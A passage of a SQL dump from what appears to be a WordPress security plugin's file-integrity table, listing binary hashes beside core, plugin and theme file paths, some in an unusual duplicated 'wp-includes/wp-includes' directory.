4�U���BD���q����','',0,'?'),('�&/�db�d�q�2/','wp-admin/includes/class-wp-community-events.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b��nu�_�hY&\'V[','B{�\r_�أ���M\'��\n~6)���+��᠘','',0,'?'),('�%w45�X��泞','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��^I\'�]!�����','��Ǧ�bt�5��f�����c��kd��m','',0,'?'),('\0��]�a�v���CY','wp-includes/class-wp-walker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('�?H�����h�D0	','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ﬨ�rz���d�','�h���+�][e+�h�ӆ��FY� V','',0,'?'),('���NVԱ��z�Z','wp-includes/js/jquery/ui/effect-shake.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('@,�]�6NzIg�%-','wp-includes/wp-includes/js/jcrop/Jcrop.gif',0,'Z��7e�����Q�%K','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('����ibH���_�A','wp-includes/wp-includes/js/jquery/ui/resizable.js',0,'vk�mO,�步n3���','vk�mO,�步n3���','u�-�xP�un48�#�.�5*X�}��z��J��g�','',0,'?'),(')��_�J�����','wp-includes/js/media-models.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wɊ��Ur���c[2','�Q�疁�n�s;�;��Z�<☱4K;~{','',0,'?'),('Fnʹ=8�_�?�F�','wp-content/plugins/wp-cerber/assets/flags/lt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z���\0��H�b–�','�l�w��L+�u�Ţ�U��J&�������','',0,'?'),('G<7e�t�/�W�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[f0L�ş��\r�{VW�','��\'&ܔ[m`�ϊ�c2E��%�W�GW�䉷','',0,'?'),('L}b&�۵�b','wp-includes/blocks/separator/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��Tz�g�\'†U�c','�����굗�Ij��2%]��\\&q��Jw\\�','',0,'?'),('`�&��锥~K3/d','wp-admin/css/login.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�\"b\"�%X=&���','�2��U+҆�5�~�=�=FL�A�ʯ�,S��','',0,'?'),('j�Mg����}{�','wp-includes/wp-includes/js/jquery/ui/droppable.min.js',0,'>���K�-�E،�N�','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('kT�fp8oo@�%\"','wp-includes/wp-includes/js/customize-base.js',0,'��Gx�Fy1w��׻','��Gx�Fy1w��׻','�s7�-<%���WȒߚC�.��.	��zW','',0,'?'),('}2۶Gg;6�yh�_2','wp-content/themes/sg-window/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�|�`9K�y�?���','5�M�՗��	�\ZH�[�j�;�x$K�*��','',0,'?'),('�\'ѯ�H��o3kVX','wp-content/plugins/wp-cerber/assets/flags/to.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��Un��ze��','^�7��\r)���KFd��FG6B�����(\0_*','',0,'?'),('���ґ-���\r�{,�','wp-content/plugins/wordfence/lib/wfCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7 ƿ����s�y��','|�uIP�wh5ڎ.m\"*n_�� 9����J�P�','',0,'?'),('�~��L��*�,�<:�','wp-admin/includes/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lp�Bd����Z�','�O� �n�uO\nd�7K[\"}��7\'p���`��`','',0,'?'),('��ĈV�t�˾|#i�','wp-includes/wp-includes/js/dist/hooks.min.js',0,'<q@o�P��u����','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('��:� r�YƸ�u','wp-includes/wp-includes/js/jquery/jquery.ui.touch-punch.js',0,'L�m�Q4փ��]�','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),('�Sx��4�@o�w�N','wp-admin/js/widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`k<,��j3�eE4��','��m����N��Dڽ��a�\r��q���1�i�[+','',0,'?'),('���:m��[ݢ�:#','wp-includes/l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(��C�h���#','�Ǹ�9�1Y�����5$�?,=�M�2.��r�','',0,'?'),('�I��\\j���x���g','wp-admin/images/date-button-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','‹?���a�0��9JQ\Z�','���*�Q����_(G:*��ηd������.','',0,'?'),('��f��+e^>�!\"o[','wp-content/themes/sg-window/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\<aY\r�\'�<�@9','��g�!d���7N@(�crb�m;yCG�t�','',0,'?'),('�]P�JQƀ6o֢��;','wp-includes/Requests/Exception/HTTP/428.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�B��}�^�t*','C�O�W%���tߏ�Y�|��&�0�VŒ�\\�','',0,'?'),('���j7r[�,��Z��','wp-admin/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,/����L�;�','��kNIM\0���ڿX\Z��S��ŁԾ��W�','',0,'?'),('�1U>��t�j�q����','wp-includes/wp-includes/js/jquery/ui/selectable.js',0,'!9�qf��H7�{B,�z�','!9�qf��H7�{B,�z�','W�b��v�(��F4��S�]���@Ĕ�ܾ�','',0,'?'),('4��B�\07qoB�o6�','wp-includes/blocks/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('\Z��lm��@��','wp-includes/customize/class-wp-customize-date-time-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('�-��\'g���P�\\�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�V�#ҹ���4�','Gp�f��Hv����\Z��x�8����1C�[�4A','',0,'?'),('D.��h�9��Q���','wp-includes/wp-includes/blocks/media-text/block.json',0,'M�0�y���~_>2�','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('D�8hFޛBViR�','wp-admin/css/colors/blue/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�]Nt�f��B}o	]','�q�̿��j�d���eo\n�%�;�����','',0,'?'),('L,\Z\"�\0C�ʡ8y�','wp-includes/js/dist/primitives.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��������\\�ӷ*','ج�BTOȄ\r�$C�O�e=h���Ĥ_0��.�','',0,'?'),('j׻���q.�*;��2','wp-admin/css/colors/sunrise/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�#���o\"x��<�','��i�!��\'��j�T+d�Q��B�K�D@h4�G','',0,'?'),('w�es��i<�O�J%�','wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	~��ZJ�yΧ�%���','�hH��M����7�m��\'iB�@�>�','',0,'?'),('�Ը��%\ZD�y�Z','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�$u�e|)�\'aD�k�','�cA���P/Ɖ���wޝʐ#ۋ�\\�`','',0,'?'),('�S������}6�Y','wp-includes/wp-includes/js/jquery/ui/tabs.js',0,'+�73�l��c�P���R','+�73�l��c�P���R','��{�fT�k��3Ub��	AxT�8?�чaݯ�','',0,'?'),('�Z��d*��Y��ژ�','wp-content/plugins/wordfence/views/options/block-all-options-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5f����Җ�Ph�','�K;��C��l]�?`w9�0����CmĂ�N�','',0,'?'),('�ӎA}ҎWZ5=*t�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b;v\'�g��~����k','m�!�M��J\"v�>,���0�\0՜ɫ� &jِ�','',0,'?'),('���ԫ���G','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png',0,'�_���Pw��PU�4','�_���Pw��PU�4','<W~���ض��+�hN��9��1�_�3�w�s','',0,'?'),('�r�W�3���᥾V','wp-admin/css/color-picker-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�p�ES���c�V','�<�=\0�[Z\n2|닢��\0?6������������','',0,'?'),('@�9����%4�y','wp-includes/wp-includes/widgets/class-wp-widget-meta.php',0,'ha�+��ޭj�s2���','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('>�SA��^���Ž','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js',0,'���\\��5^����','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('C�y��8�\'a���','wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0mj���Ԟ�W','�͛=��ېI�hK�g\0��%T.��]��\r��~','',0,'?'),('L���8��\\�ݼ+','wp-admin/images/imgedit-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\'��6U�������t','�?�؎)�.l�����%�<�(�_� 6�`^c7','',0,'?'),('Z��T�:rIG�g\\�','wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',0,'�ZƾB�,J)T�cx','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('\\�>�<u0!�>w�','wp-includes/wp-includes/class-phpmailer.php',0,'\'��F!;� 2󱻱4�&','\'��F!;� 2󱻱4�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('m�ñ�~���R�?','wp-content/plugins/wordfence/views/tools/options-group-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�!�aJ:e��c�','3|h|��Kqh�{� \r7��kH��\\�~e�l-�','',0,'?'),('n�T\"���x�}�','wp-admin/cachewpcheck.php',0,'���t:�V����4�','���t:�V����4�','Ӛ?8P�#ΖG�ʈ��F�|D{��y�','',0,'?'),('p۞�2N<:Z�7�r�','wp-includes/js/tw-sack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('u�)8FG9�C�(���','wp-includes/js/wp-ajax-response.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/pM]�{\"@���s�:l�','�B�HQW�2����a��w��C���- Y��','',0,'?'),('�eBU\\k�h�tK_�6*','wp-includes/blocks/subhead/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�L[� ���3�','��DX�+C�]�D�$W+�f��yi><�\\�4��','',0,'?'),('����9�~\0{@���','wp-content/plugins/wordfence/views/scanner/site-cleaning-beta-sigs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i����oAP��=a�','9s����Z��D×e}���vu�O���','',0,'?'),('�u�t�� ��ɪ��','wp-content/plugins/wp-cerber/assets/flags/es.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݵ�*M,M\'A@��K�','�򐈄c`M�Cu��6�ם)X�%|G�W��ִ�>','',0,'?'),('���Clo�������','wp-admin/nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#����	�H��3rƕMz','��ǃ�ĥ��<��##>z��&�P�-r ����','',0,'?'),('�&�	Y�tz(�\Z��','wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j.\\�0*���	[����','f���8��\'!�RF���L���˙^�w��','',0,'?'),('��I<���U�CMdZ�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\nA�I�g��+��.','5�N叜p�o\'�GYNsC�IS��>LJ�','',0,'?'),('��-��i>bs��1�','wp-includes/js/jquery/ui/resizable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('\'Y���֖�>v�ǡ','wp-content/plugins/wp-cerber/assets/flags/td.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��б�n�HБ�����','��rJ���VO>\Z~dƨn`ik\Z����\\','',0,'?'),('9�L�/gJ�)3','wp-content/plugins/wp-cerber/assets/flags/bt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�@^؟J�H;��2:','	��\'��A-��êu��rdƹ��Q����','',0,'?'),('m0\"r��4�R�u','wp-includes/wp-includes/js/zxcvbn-async.js',0,'=�$a�[ZF)^\n��~','=�$a�[ZF)^\n��~','�uQ9ҫ{��7o}�����`�-nW�','',0,'?'),('~��Y��(�C��','wp-includes/wp-includes/css/dist/block-library/common.min.css',0,'��XBI���mC�','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('��4r�%����j���','wp-includes/SimplePie/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�~Hwb�x��xsٷ:�','0���sD���;��P�=�\'��2�	��\0Df��','',0,'?'),('��KS+�e׎A�@��','wp-admin/css/colors/light/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��Y�Hn	T��5^�','��Y�y�7B۩���/�c�಻�$r��&���Z','',0,'?'),('�����Fe�	57[�','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q��3岛�u�`�At','m)Th�)�\"=>�#a���Z;V<\0`�h	�5�w','',0,'?'),('����UNEA�g�t','wp-includes/js/customize-selective-refresh.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�uP岉�0x\Z�����','��q�˖jZC~����<sħ+�RI!�H��','',0,'?'),('�A�o�!�V��ų`v','wp-content/wflogs/ips.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�X�������EA��','wp-includes/wp-includes/blocks/missing/block.json',0,'�$�YԺ\"9N�Rt�f','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('j���n%Ut����','wp-content/themes/sg-window/img/icons/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۱D���=�c�JP�)�','��==o�͘3�J����e�=�W]N�\0�ϥ�','',0,'?'),(' o��ƕ��t_��\0.�','wp-content/plugins/wordfence/views/options/option-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ص���k�:]����','I���p��A�B�i���7��0rME�$}�y�','',0,'?'),('%~WN82��Q�O���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n4�F��0JC� n��k','�Cb,���\"�\">j���Ŋ��AlD�','',0,'?'),('G�%%�as)~^j��ؾ','wp-includes/wp-includes/js/customize-models.min.js',0,'/�o�ϱ;��Rwc','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\\���\Z�e	�)��Up','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȑH�\Zb�>V�D��R2','rћJԑI/�\nO�Y}�x��ņ����U ','',0,'?'),('o�ƙv����$��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.js',0,'7E�~?V�֬��o�B','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('w���+\0���2�R','wp-includes/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zjo�\0��y,�*�}c','2p\"Wj����s�lf&S@�[�\\��\"W�','',0,'?'),('��4��t!��BŌ��,','wp-content/plugins/wordfence/js/wfglobal.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>q� �	^�&�4r�&','���V�\"��_���+�J\0��_���>�J�','',0,'?'),('�-��B��|tS^�','wp-includes/customize/class-wp-customize-nav-menu-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('�ECW��`�`��-�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_@�e���3�b��B','�L�ؤ@J�9OhG�@@��Z!��\08#l�(','',0,'?'),('��=�*�����R�','wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php',0,'O�P��/:���#�A','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('��+���>��\"�s�','wp-includes/wp-includes/images/xit-2x.gif',0,'�Ӂ�u:@4\r���z<5�','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�t��d!b΢��ɪ�','wp-content/plugins/wp-cerber/assets/flags/tv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JP��ށ��߼J�','۽����ɇR�ZN��P����bX�c9h;��','',0,'?'),('���@߱�:�J�','wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php',0,'�O,@�ۺ�a�	Δ��','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('�_v�DO�2��\ZT�/','wp-includes/wp-includes/css/wp-auth-check-rtl.css',0,'N�P��KN��zj��K','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('��\\��h\Z��)Ġ�','wp-includes/blocks/paragraph/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�T;��_Bjf�����','�Ƈ4pc���[<3iԁv�D������How<','',0,'?'),('�*Q.	�-c�%�D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��c�磭��c�-','8�Y��CO���0�j{�\Zx��D�Ė��x�O�','',0,'?'),('�v|Q/B}�M�\r`��','wp-includes/wp-includes/js/dist/api-fetch.js',0,'-zLܗ�G��3�|4y','-zLܗ�G��3�|4y','e�9����x^h�Ǔ|B�1u��2t�\'�Y�\n	','',0,'?'),('��ܡ9�u_\\\n�9�\'','wp-admin/css/color-picker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���x��Ti6���','ۣq��T��zu���Oi�\\�5ЯY�u��~=c','',0,'?'),('�KU�g0MU�/��ʇ','wp-admin/admin-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xo��_���Բ)\n��r','�(�Z!.�e��TU92;�����ݏt5o�^','',0,'?'),('\Z[�`��0CI$T��\'�','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�H��$I�3��^0','Dsmr?v�jz����Mo�3=b0���K�R#','',0,'?'),('4;V��\'�/����f�','wp-includes/js/jquery/ui/effect-scale.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('7���OW\n@�a','wp-admin/css/colors/modern/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&D��	�?G*��c��','�����w����V�e��am��x��Z�}\"6B','',0,'?'),(':�f�?bj���.���','wp-content/plugins/wordfence/views/blocking/block-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j?G\\��g��2.&`�p9','F��	��!�\ZB�q�ecC�u�]��P\0ŀ�;�','',0,'?'),('?�-���H����+�','wp-includes/wp-includes/rss.php',0,'�4|����e��(r','�4|����e��(r',':��.,�0aH�A��\05:�f�s\nf������','',0,'?'),('M9\0U�H�%> �%�J�','wp-includes/wp-includes/plugin.php',0,'g�v/�M��;�7/N:','g�v/�M��;�7/N:','AI�OZl���wC�fj�@�r}���H!ѧ�Q','',0,'?'),('P6�k��O�J��','wp-includes/wp-includes/SimplePie/Cache/DB.php',0,'�w���M�\rʍ�|D�','�w���M�\rʍ�|D�','g#�����]\"�h0Vq�)�0��j�%���I�','',0,'?'),('T�Ę5VH���P{��','wp-includes/Requests/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\0��3�\Z�RI','-@��g %�����uON\\}@l���f\'���','',0,'?'),('a�yh��5r5z��N;','wp-content/themes/shootingstar/css/pie/PIE_uncompressed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$:�ٰ`�:��','aѯ��x+���E�%��)�#{4E��\"�~','',0,'?'),('��jo����8D��k','wp-content/plugins/wp-cerber/assets/flags/tz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�0���1�_NM','��_i`K�@D4���=�Z�2QcuY!z�=����','',0,'?'),('���C\n���U���','wp-admin/js/custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݎ�\Z���\Zڸ���','��v�N����;d�V��5d���t�,�','',0,'?'),('�*�Ƨ2���s�B,�','wp-content/themes/sg-window/genericons/COPYING.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B;��a`GԢ�މ','��+�P4�g.���{���^W��/!u�','',0,'?'),('��0l��j�0+%�','wp-includes/SimplePie/Source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��A:�$]B-�vw�)','�\"���9M�a���U�_�h�I��>�,]�C�','',0,'?'),('���cŖa�[��Mc*','wp-includes/wp-includes/js/dist/priority-queue.js',0,'����A�<_\r^،','����A�<_\r^،','-өw�r��\n�ϸ�`�g-7�����.�c�?�','',0,'?'),('֮�V�7���|[+<8F','wp-includes/wp-includes/customize/class-wp-customize-color-control.php',0,'�&��S?��|��G','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('���窒�u��\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N�;\'��M��� Y','���\Z�7\0��r€/i��z;ki,�=L�Z�g���','',0,'?'),('�)����t\r�,�Jڼ','wp-admin/options-permalink.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�\0�+���qQ=�m','Wsf.̢)\nP��_(�%�Z|��EV�t\rx��','',0,'?'),('�ֆ�\"+[� �ƠI','wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js',0,'2�8��:s��w�9�J��','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�?DŽ����:\n��X','wp-includes/customize/class-wp-customize-theme-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�	�K���WTՂ�c�','�&�^��J�eFX*i-t��;��8��t�\0O��','',0,'?'),('��g�<)��t.F��','wp-content/plugins/wp-cerber/assets/flags/aw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�g�qAŎ�RAj�?&v','J	�M��wPs���0)n����F����b��','',0,'?'),('\Z��) �%iy�δ','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('\Z�K��a�2Sc��kI','wp-content/plugins/wp-cerber/assets/flags/za.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	֨���˅hq�d�','s��Δ��֫V��`��`�R	;��cϯ���','',0,'?'),('\"��X�Qc��_�N�a','wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php',0,'�dl᫁�2�A��\nW�','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('-��~SI:�\0�b�','wp-includes/wp-includes/blocks/block/block.json',0,'��:�,:�&\0�:�(�	','��:�,:�&\0�:�(�	','1�Cf����>�-K�J\"��1�%�I���P3�Z�','',0,'?'),('3�қ!`�&��,�N','wp-includes/wp-includes/js/jquery/ui/mouse.min.js',0,'���J�;��ty����','���J�;��ty����','�G������[&�~ͤ�E3�	�z͟��ӱ�','',0,'?'),('3�d����yj�����V','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��fݎ;��#T��','�>�:�T���O��;���w_S�ݯ��&','',0,'?'),('Wl��y:�\0Vn`�d\0�','wp-includes/js/tinymce/plugins/wpview/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&���\rb���!���',',�`i�t���ڎ�Tm��l��k�s�\r=','',0,'?'),('�,�4#��(�#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�*�\ra�*5�z�?�','��XjR�|%��Vs��j	��Q�XZ\r���','',0,'?'),('�|���sS��u��R','wp-includes/wp-includes/Requests/Exception/HTTP/305.php',0,'X��\0�K��/`�,��&','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),('ǖ��d�!s<X��Я','wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*�1{,˾�ʂ��','<�G���$�U+�k�L>\0h�ahB��S�-�','',0,'?'),('�*沫�Q�N','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oV�7PR~׬���ai','b�\Z�����s#:�*�\\���\'�i@���qa','',0,'?'),('�Ĉ��ψ�x�>�H','wp-content/plugins/wp-cerber/assets/flags/sd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1y����s�)�x�','�	�ZL���2���H��j�o�i�����','',0,'?'),('��y7��MA�@���','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9aP��,\n0��cHt��','�t�e�������wn2�v�\0o����e��2','',0,'?'),('�_)0d|�6_�;n','wp-includes/js/dist/rich-text.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�N��ۅ��\0�m','��>q�ޤ��S+�oaW�����Iq\n��E�','',0,'?'),('{��j~\'d���.','wp-includes/wp-includes/blocks/freeform/block.json',0,'�oU���ޘx)���\Z�','�oU���ޘx)���\Z�','��Ee��d�._=���r�hQ�]!�+�M<�8','',0,'?'),('>}�/K����q�%','wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('��<��i����Q\0','wp-includes/js/dist/reusable-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'\r�ѵVx���ݞ','��`|�G�[R���f����Q�ڈ���','',0,'?'),('�`&%eF�g����d','wp-content/plugins/wordfence/models/block/wfBlock.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�1�g-M��@��','�Eϑ7���^\\0��uy|�]�J���\0�4��z�,','',0,'?'),('��?Ϡ���򦳝�','wp-includes/wp-includes/js/jquery/jquery.js',0,';�o3�HH��䤱�&',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('�:8�Ia��øl�m','wp-admin/includes/class-ftp-pure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&�}�\\3��J�� 